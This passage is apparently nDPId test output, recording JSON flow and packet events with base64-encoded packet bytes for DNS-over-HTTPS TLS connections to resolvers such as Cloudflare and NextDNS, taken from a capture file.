d3IPzPYj2FRyDUuFDyWgT\/cwlGc7O60WUydzXXvs9ttqI8TuCUJYd1Ao8xx8mAgIvrwtyiwJR5QZQxYq0NnVo97JO1hRxuXJb+LTsywktm+cb6647KFCAIE22xi+EiXjOKZOlKgY\/++l2PKcbQh7+iHITgTYo09PyNcnTJxUwLKCZUcpj08uHLE+si9w6kmA+pKFDGKHD2OQi0\/dVl+2FqCH2+A3DCa2Gg9EWzElOrJ9mp3PsOzxGAh1T1616sYT0her6SVuXlhCGP0slwtRkTfN5tnJIo22tEgWtQ+b6y1PTsvRTouR9DpgUBw8BD3g0lRYqf3KAJIjUNpSvsRMGe0P3S4KCcJTz19EnjfZoP6uX+a1+4rjk2AihvF76LGF5wO7bsnmmIDYTvndhSZUKAm3a49yHTGG7gVwYkqmq0TRbx3kmFRXEBuvlULDIz+RlQyLwuJX5uRyHubvUf803FCAz\/4a9pnE6WEDc+zOoXHErWhAfoc5tjJI1gMxGX8U3yJwrwEtij2gQTn0Bbv4+6DXg8iV1mRetvz2V395BS+h9qVm0PJky45RjI5FxKVNW8VUHbBkrW32Ln2Pm3mojmUt+Xsx7zInkOkVoS97LxHGe13JTpikDPPGgpjpEoHIcQRKqtRb0XznaWZx01cfmn3isfcOxCOvXJUXQwHOBr0ZOeVU8JyV5j86F3c2x16THC9pMZadmbjMRbWkSLTw4DMHNpPKhS6WbcQJhxPZwfAVbKEjktlF0JguUnWmRyDWlD919TvF+XWK\/xSop+ME26vjlWYdWryJvX71XiN34ciEg6jsS9BSYdT6j+C8MLHQApTVrKIlUjg7LizXHOZ\/8TbPIjDL1MmbwanCPsnz+x51R4gaxLum0nLoSL+ZmdQWjq\/uyo2YE03WUuDCwEqP451PgmdaqLRPfWLB1DwCAkXZchOxevuMOjyvWV6dC+e+ksCIkxwJmTgcBQXwfuBwje22m5Cj2nv\/zq4aMsV7kiFOS1VcPYLEbw+c4UolvdLrBBCbMxCQZeGhjAzGdsZDuX\/6sRIGIbuHAE8nIh+KJ0joM4KoZNtLXSA2HqbNN+kRQ5gTFmAp4mqAOgsHxAv6V1xCZg8P3MEffeog7NEB4\/K8wtwtgVyjvZaZ4E5jbN5Fjj\/jqK88SEXhkPYnN+on2bA\/r\/BMBIaoCajkogUyGLoyIPMT+pBrWa+wfZKdLurwPxZw+jCxKJC0\/mmFBL81N3ktV2QA+uWulN8QPCd7cD0\/Hjf2QklIJga5shMEJkHY6px3Tk68O3abNmIreZ6S\/N71agsTVbVTSaRlprW4p5D79LYThW+q2zikyKF2eG4VtVQ1Z087sY8sCBmmZG8ETPN5Xq0TN3Q1mXCkwjS9y4DvkEf4d2VKsFN6yj110+kONDzC8lVgKicr46oqIhZ9cyUDwr5+MuFqHiF2KMvJx9XA7v9+a265RIEavlSRTRm3PXbeYNOWUADrJWXjguUacdKmikyCoiD9vRp7ll6YxsV5jSfRT\/9SmZeNE+aTDy2wakB7qY1oeeLE4kVchDyQa22zUAtVHOgOvTZInJYA\/takDFgegJnQaYWISVIejbCOHLLvY\/LGAj1CyqRrh1\/LJm06TJxFQn5cMNb5SSEJFNyxF75PSPT288zWx2Va0aIhDIB+vku9QlaiV4ac8CwDTFNaqbQKECa5ibv22eB002L0jyDWacUoUluFvwofh+CTE377hEPfvjsRjX+V3P\/erPya8F4fW7JQkFJgCrTK1VaoDF64ZvLzNQJ5aCIC3Js6D+sD6g4jOpLHGy2zHMlk9wTN+yBybuSBsrJL9uS5j3JgQRC167kARpn8\/3wkN3\/lvlFPoVYVhj99l\/NeW6y\/YdomeNnyw0D7qas3wz1t0EQFticUf9LLfRMzRHEf20AYOoy9Fonct0XWUb6fLDU7CQJTqCHU8Eiy+rgD2t\/dxE4NlpfZ2ZSbDZ7QWFdftipHKlR4nJqLL0sU6kjZ8SydsZ8oAinHCIV9v5PNYgUBa8WbGYb2kgxJMSN3jbYzsoGwAsbdeAghc0S7LurZvISJXwa0jBqUzUHZmweZXCdDnfDiPc92KCXG9hA13VfXTouQnTd0zyBwPxIcvLGDhAu1CCSmBlGZrOEjmOi1\/i4ug\/A=="} +00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378577,"flow_last_seen":946739378607,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":1393,"midstream":1,"thread_ts_msec":946739378607,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":946739378610,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739378610,"pkt":"REREREREZmZmZmZmCABFAABoLytAAH4GiGoKAAABaBwcIoO8AbvZKqYtoyMiIFAYAfVFVQAAFAMDAAEBFwMDADUQNuPt6m2nY9MgXiEHZRB5L+gDtuMOMxUUfy82Uox32sOXoFpXHp3NUSfU3Rmr6gABtUijkQ=="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":946739380697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739380697,"pkt":"REREREREZmZmZmZmCABFAAFIsgNAAH4Gh+8KAAABAQAAAdIqAbvH6z5LSWNp6VAYAfbC9wAAFgMBARsBAAEXAwNccnLckexdP3Wz7tsKiknbwUElui2FZGSKODu9LnFkjSDCKDL2dIORj+O\/DGu\/+ddISHKLc0yxsHWSEQ0iee1a7AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zLmNsb3VkZmxhcmUuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIM\/CjtFE6\/BfV0qVOcMMUIig11i56\/tpHaQ1FlARye8w"} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04322{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":946739380725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2892,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2892,"pkt_l4_len":2858,"thread_ts_msec":946739380725,"pkt":"ZmZmZmZmRERERERECABFAAs+VjZAADoGHccBAAABCgAAAQG70ipJY2npx+s\/a1AYAELM7QAAFgMDAHoCAAB2AwNqFtv3xWSYHbL\/TEVcxTgtPyY5syhT1Ar0J7GcYm2olyDCKDL2dIORj+O\/DGu\/+ddISHKLc0yxsHWSEQ0iee1a7BMBAAAuADMAJAAdACABwPRBPqMH6tP2UgTdU38yy4IBdMrNy3Y26n6nkJgoEgArAAIDBBQDAwABARcDAwqMAOf8HgLdG4eR2zQrlVcXNJK6gSgekjnntDDuH\/5mItzTS2PjuRorCZtp1e456Yzxd\/c9Pjo0KqOApsf0Oet3HLAxOPX\/4mq0oqPJv6\/pWYh6XkL49x7kn3sA8FLizWIik5oy6pRjSBWFf6tqxUO+Djt17wQK6yhMls9hUq1ClHJUh6Qn273NZpiWOuHCd9wGeCfeInHvS8qk0EqIdne\/5O3+AKgM\/cALapdKbBhIoAyrPwqC2hLjGuasAzda3QO\/+ESHum\/F9d6o\/5K+8IYpY8o8qtVJ6Drg8futbzGhAS87lZYW5UeuuFH05CzhM6cODq7gNj4mbPjTJ5ApTRpwsXEw0cwu6tAiKdHBHu4s131JOS1nhPpDpOs1W8FqhOijP5pChk7nVfwQ9Bu1xYiYmTlZWYP4bC0IhVSltsY4+ffd9etk6QNu1u5Seoh1QaWRe4DU8GYPqDdj9ywHuBnTu\/kdk6yObRcYizbhLyG5JiQSyxA9bv7iPMzOSI\/oPD6Rw4c6cy1qJywZ7F9o\/W7KUU6pYYhqWRcunfBOy2cedxZtVaWxcAQGD7VjEr1GjI\/ndJEL6DV\/vUO5PSsHgdX\/GScVrZdS\/KHwHxAHOv1BpKxNHl+ElIeVfCJc4tBsNkoBf5+COT0BV1cqDq\/0TqIcpVxlMv3\/7JDTZZTI\/wMxcbTZkEC580\/OL4P7o7ZBv1lVciiiGUxirK0Wn0VmKVkOPUH1VVDEVtxbspQjAQAudOqLnKMivdYYnLWKcLFjjfuE8XwFn1JkF2YyGgtdu+0wxe7V3QdQyeX6wSKDfGOBn1RHTiZSQJLrjf\/MjK6PK6+6dmcX2K\/Nos\/HKCWzOCSGOxH6pgvl94s\/0dDawx7iAmW0aKHP7fN\/Qsuj7qBRlYmeX3wDSe3ACAyO8PJtifBKRUnx+i44zF\/TEZT9\/0f9hj1yXYZhM4IttxvCtS3N7k187lM2JB6HB4DmePSpA5UfxEPRq71lNWUsDLAAiN3ekJSKoZ7PUpp\/6SJsuSwyITjf4EqBLpeWL9MrWeNXoUk5W1F7hWZmXxUwbc9PMEuirTVJUIeKJcMT3hUo1x6K9jQ+3H\/3FjLuAvSaGN20\/JlmWzUhH2c19MbTsBdNUca8p5h9ftAYWxNZFi+BPME56GacRIjusosOaDm6TM6NIeJtcd5nQ0Y6NbfwEe7MdB0akdNH1SZ5FpPCUXE+5h9eWmGzxT6gCZx6qvA46+kjmSPa8Cj85dDYPgUItxPMDzQDmcDkFl4Jtoqp7CsVbgDs2FaRSNSCg+ZMEThJQx0\/Aqz+vGM8Axcf5cpBgdqJqmkgft7WVM6LgxM0bWa6ReLOTbftdrjvt51qS7oW8iSFCaAMyVHnB9nNub1rCB71JGnHgmpLaDriPHmvZHyXG+tF3YYxqKFpVLMzSELDqif9S44Mrb9ZjnIWKvGQryM\/QSKoEg5X7zctl4vxNBFap6BlJhqRr3fm7FAc37N2CcUPqfx3Q8d+odOusP4Ls3Xq2Sur1UmBSNW9zqMAV9eCaagN4swiO+HX9D1JhZPxXTW9QWyDXi2zI1HI7LUB70fqeJS7u5T5BooNTQeoNzZVCvWOXWLt+ZiIbxI46okrDHFQXi\/x2G\/UqXdfkOEinNyh78FxOnrKcOtvfU1vQdaz7Z3d1S6XTGxIbp7Avs8yqCBkfYYx0okhQoRYkFViIAKhs8EJ22ENemkpy\/xMNRrY7HXIqAF0plC7ASy6aRPBxNQLpe6Ed5IaeUHDV+pWuEiLAgXAO3BIyMmN+dKwyJRSjGew81SAxYCXzqNGK2p7GdpO\/XP0maghqEG1aIROtTBX2ArldnERnpk4NXjDbfgsSkzP20ClfXeN4yjZTmAjINRHsDFyBG2kVPsbWM6bJ6sXUqNBkjHzH8mUguB01CThNReqO2rGsLiKr5qTMAwxKxjfEdoEJ+OdtfVMDr3B0PaBDiW6NDXICwJTMjrTiHsqLMySrS2T3BXPc1yBL+jDROuKYyhTZQzCA6ktzSKC6wAMC\/2RMbHnV4JUqSuJoXnZI1jiGQfafDh9qm0ZR91\/Upntxs\/kWZ9Zofn9x4gsvGL94XY2stn+kYJ+lpR5T38ZBRBOsXu8bAGsKAP+3wt7PlEML8VYdMSv1Y8XhaZ4vQZT4mxjokM8a+\/vbBm5OFXEOAsw3UpeMp5Pdlywdfks9xANyyHcs7XyT+4nzRjV93W+RbJVksh761\/0CsogB0Bf4AeRq1b8bSy2mVWD\/C9oBFlc4PSw+jhx1uKdorr8amCiJ2bwSUXaBBKYKGtf3eKS0Vrr8DWhAzmAupA8TRMiBwDgWH\/pSpuuBxo4fKT36lTdVMpKIp966xzVRYeAdyJ8dQTy5jeDQL1o\/K9FAvaIxIHdqy3Ai9UpxdTmYwoZXk1RGWSFQPWK2eEqydFLHkwLiG2A9OQ8pCYrZlqHUn1snev7fQAbwrXFOXDJskS+CYp+0GQvu\/Fu37N\/vYvDe9yQ2BjQyb\/Aq\/mNLHkdVzTu+oIIX6og2jNse2SlImfdMuiBssQFePUieOP3nrkgegmZDkJvZU8\/IJtyIPGhvEr4wy0KRjmbk1R5TV1oh+Gvyump800hgoeZ6yINLishVXjkSrZbw30TzgVyIHMXbfVH5cMb\/otpjX8v74ViZ68NiQoVQGCiu9Qccb9jITaHI7YqId83HAhD0Mgcvql8x4riVhsLhWBp7KARZMNylg6FCWQzYhkomLcDqOeaHr\/i3Kucv0p5GzUzkUvhbOyyBarVy1r5EY3Ff\/LeERfwiWeu9JMjSlW9a76FWzNvpbjiVQvAXjpJS+B6vW0S676\/2F\/QVlBvmv\/1e3jfE46NEORC\/KvStAu1+NCVXXkgYYjYaavSuMFqEVMBLpNt3pqmD175kYHYjG6R6TDv0nmjRk\/fdkSOg4ydMi2g43e05SDICPCTBrKL+H8pdmtKEp3WxofXZCtNR+ckTvaTdfJXZMWJbImpAgp0edudixTNqo9z3f5BRBQ1U170EzzThEQIMmS6RHUG4MBWpfatZDm+5s5WqxzAc+f48z+5\/Rjpm1MjT7FAj2QOS2mS1pZuw8jR7f9mlmDHlYUa7yULFKz+EOcDFjny+TGuKCw6tBmvp0uAgOgbWkR3PGwLQlgJNN5qcasz\/DdlRFFRc1kdK872NuK41RPGMSa34kfvjKckPj3jn4ntsF1i9WcRtXZaTKddZmAVoibh8F7o+\/2BqWfWHshjLjbv2UXOWt85MGeIvvR+JAZ4lQKxhMp4ApqHsqTnv9vjAIsk+AJwp0L3kf96BrAf5lxFwLByeiu2ScazZunSG5IvLxJ2cCZzgYOFm\/xSZPCmFYvKNJw727A0qH0cpDBKVk4Z5vvRen3ROFERblATF0imHD72RVGcQ\/rMrcnTAneuS+605QxQwV5cyssndlHujOT5cJjQwi4Me+A9i\/U+gGMItbvzyiV\/bH\/dnSH\/6+REX1pIGyZTP+9n2MXLAZnibrKAMIRfK2TIfrOe5jmJF94vcBm\/\/5ycPeTZII89RYTOm\/OYD7dCL\/Fj+p2ZF9GMMq1KmH\/crTCIqHICoTep9ezhaM3lurJnltFyZNv3oliEoTfl"} +00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380697,"flow_last_seen":946739380725,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":3126,"flow_avg_l4_payload_len":1563,"midstream":1,"thread_ts_msec":946739380725,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":946739380727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739380727,"pkt":"REREREREZmZmZmZmCABFAABosgVAAH4GiM0KAAABAQAAAdIqAbvH6z9rSWN0\/1AYAfXCFwAAFAMDAAEBFwMDADVke5XeBLKUZMMwsdywo3cwWM6dcwvPxEIBrrKuQwAVECVGBCt8L\/1vmMSczXlzhvKSsbEzJA=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":946739380870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739380870,"pkt":"REREREREZmZmZmZmCABFAAFEC7lAAH4G5eQKAAABLVocAII6AbvzwYfFjc3Z3lAYAfYLTQAAFgMBARcBAAETAwME0sG+tMqbxpRl1DV8Z2dnX5LfzpIiHTt74xC1bVbZqCBq5Am0FD9Ax\/Z0hd9jpGF+x36pK3fx2LqXRJeDdYghvgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOZG5zLm5leHRkbnMuaW8ABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAghy6XniNnPGDj9u0r7tzchu6tmfTKqCDkZge3YRdGMjI="} +00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":946739380903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739380903,"pkt":"ZmZmZmZmRERERERECABFAAXUAxlAADQGM\/UtWhwACgAAAQG7gjqNzdne88GI4VAQAnmV4AAAFgMDAHoCAAB2AwNSUVDmrRSBFJr3VlpPTiOBfna69z7Ip3AgaZ4JY8XZPCBq5Am0FD9Ax\/Z0hd9jpGF+x36pK3fx2LqXRJeDdYghvhMBAAAuACsAAgMEADMAJAAdACBgLhCqxZDxBYT0wty93r8WAtFFYd34UV+f0SYd9yF0RxQDAwABARcDAwAgNdJG6I7V9ce0uN\/W8MyCm58pWjfsCFZXXJnMcWaU4P8XAwMJ4l4xzn1tklFeMfXUSkilkOHkR2CrV0Fk61C4hUjayiVX3XCUzF\/nVmk3NsjsUuGQs+ELPFl7aLMJpdeipyb\/BRKM7DDOdlmSjSZFpz3sI+4Ap1vb842GKpbBCp1KIgOgnmXfMMwnL4uKzNN2+XpL8V9LwuMNROahwk9tJrSx3BZQnvVy5qktKVugzkoTSb9fPpFovSjkUbQUBQuFWl2cxLyQBO6gjWiaDBpgoqREkqW2UGurTHpBXCvX7xTK+SGfs3VLNGPL\/jM509wXezmGXrBZolGpSBcCmwqP5AGjSUkJQ2KFF8\/5I5DLe1rWw\/7rCzdCJgW7dwItPpQigYvEpUhaTQyjzhLtXm4Br1gtr+Iuf0HPHYTCtm1Z9061ijlO7AesYAg3NSX4lpTeBeQNzqwAGQi0kxU+8BsfAI4uhNY4fwD\/tgZRm00kCDUGr0Hw1O0\/9wcQo2OrT4hVI8sBPv9rovACUd1xTXQBUu4c2UNVQr\/DAwgtr3oGHXN\/yf6hHksHqaO6ThyUELGPZgyTaAEJeYSlV\/UuFXosuXrXk+4M4bQmtm8xQA\/hPEgZw03CxD+XIQ9CziCJc2Lx3r4h2FdBiMwzohldpvHSBUXM2GuHl07Muv9yz1FfyzqYAimU2llIffa6XcR6\/N9ex4PCYrVYeRifJmT\/hN608lQ56Pm4ckRgIW72lS0ILwL91eG\/PWLw1TWr9OHqib8dqID1N28WvnDQAc1WG+OfvFA5Lx7KtiZ9\/3KI7f7RCYG\/5anpOjN3Yvo+yrHT\/\/9yxTpA2EDhXmw1I+drMKCfdVXEwoRqrQDXQ3qu16NE+piWO4zYtxH6MrZOf5GKUoqj85zhZkJ6n3Wtdfmw0p2w7uWnPZarz2kRT1hGv0H7uWAwQsIO2witiCTCAX0VhCKqX5eg9HlVQxEJ8e6aZG6udk28L+hlu2DjHm2cK3LT5siYCZ+61rOCmuWYzAzB4PZwDYNVRnV0GsHgMCnZc9N4\/ighhHZqiYL81av1zekzo7Qcc39eQmJB1\/vhuqI4+c3vKnv7ROdK1hsAX7hP\/VFs8H8ZF9FxFv36aFuAu1HQxIxhZTCwXDQcu5TzVx1PL5uguNjR7pwef7T5COi4aTCL27yji1k+uS4xQgf7uM7lfjr7UlwSz76e6z\/NdrgDABxN2pYomW51+xON8iXDOy0cXgxInpylLI6lmV7hJWGh+rssjjMTkzOSia\/tb6HN8MDXz8ND7qC4wdRBL+K2XXzk7CxXSZKHbU7oBKE3VuTcSRmBvFAj4jzbuAW9nVI5Yw9M7KxJ0oNCiAer+7rkuV1\/dCwQt\/7\/zkSRGAemKSurrkjoqozLCUcuNRu2YlaJLAc\/PeEJmeHXWSos8ReOKG9libwm6aBbFjBhBGqk11oBFxYMJe3fE8zx0cKng5v141kUW5K8KykDBQPlm38itlnDfJBFaB9Jn9F1Dk+fc1GMvxAKNX1KD189yDAOfdy35szVs+4vU19xgaD3Asb+3zoIgGeHaF3v5zAsODf1V7zFmYGD1A5VyodE+SZcg8yBGqWdCjN6Dq7+yW5n4whEBATh9+W8PK0m19STC9EnY\/KFQ8CMbZglLaqGH9UHLlwuaNZUfgFyrj24dAMianUUp6I5pp2CbweoDVXgQfGbkHcfYC\/73I2CAYRQxi4XFXP\/UJ7vD4Iv633KLKMEpQYwdikhrjOP"} +00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380870,"flow_last_seen":946739380903,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739380903,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02374{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":946739380903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1467,"pkt_l4_len":1433,"thread_ts_msec":946739380903,"pkt":"ZmZmZmZmRERERERECABFAAWtAxpAADQGNBstWhwACgAAAQG7gjqNzd+K88GI4VAYAnlzfQAACEkFkdj1Us7HE6XsQGxneQX\/pTaXJNHBzTBwjbjFH2PSLY9gxHervwko9HwLHhkgWdiRotlJENzv3dIlV0Q25g7GanzLzAoq\/bJLnF1bxRf0nf8R7xwqHIiEyWrnrfJqukts8v3m8MMBnkDAGd5xOmtynEVhFSJmjPZeWlanPH3W\/gPE9eVpcr\/bC8aD31d4wHJftv6KUYCRDzDXbCSoL\/6F7bgfENCEavhYW2LuID8zVPN+yKzb3WDD71Bfm\/QzlUMFQuZM5HbG0c7uIAOOAxkawVYPNiqL2TFCk1ynXFgmF4gXvbL\/HYrDLFRfjW4de\/NkjjSai08L+PfACua2q5oTvt2qGJPeolVEHsMmZEjEwazNhDwGqFKG5OP+F531r01cH7BTJcZ05QE7qXBrbvqwdtdoGPvG50ZEjeoenLq9i4bYfhTR7gqdrp+nT5HdXBlwZ3BA7TNBvRO28EIkDbwnbkKR1uAOgeHpmVvBpmpiphn4DYQZvVFKBDcAp0CgnjFhQ7BpU5nrco2WQPx+1Dj+wVwuk8wQg4nsuaxF9uoh5BJPTUJDd+oGcKzJnMyQnjiAungCkABFhOHccfPCI4WdjBjLMLNqgoxHw6DJHYylEKtOB9OnnXDF2J7Jvo9Dz26D1KrzmXsDWoLDC1fC96J8yd93fYvTZHskQxfY50BQIAKcBIdr8K4+MowCcaLlKXgQ2BvySvU9B5mJVdaqmTLF1fzesL+WRRK51q7IAwLh77wssc7jt76mm0H3PAWysYvmp\/NCiSKfjKaaLkm9x2NoEkekjBVCT4zJZaY12lyFWkBUvQQdolUu\/1tiRf86EnZ+MpspCpIhymi\/IUp68M\/Eb+2ljNKVmV1Er+pytZKFdhm+LxFZQDgPvwZts5tJVArrKTXEX7mbMUyNCFK87rJIQtF3h75H2QQdF8Dne8XAGsXDDnswycmS8W4DR2ei8Mvw6EchukCH49+5iX+zWw8yLNfbuXrdtwpsTWibehpgDGJwJ32GJ3PUhcT2O8ckRkT01hA4OhJ5s8FVi9G4sK5PSDUaW\/FVD5mXCOlbG6fI8ep93Cq318IKEa9gHWkRIcGP1KNeJ0vqPt6W+fiprWcAT+y38\/pHS\/DIldwWXxoakgp8kEgE10+BHsdUGoLtM0vHARs9JoXziCU\/gwCe4xJoYT7yIuKPLoyyOJzupzLZV+Yx6GthfYTU5x9FRZbuuSu\/4e+BWK3Ph42jg8F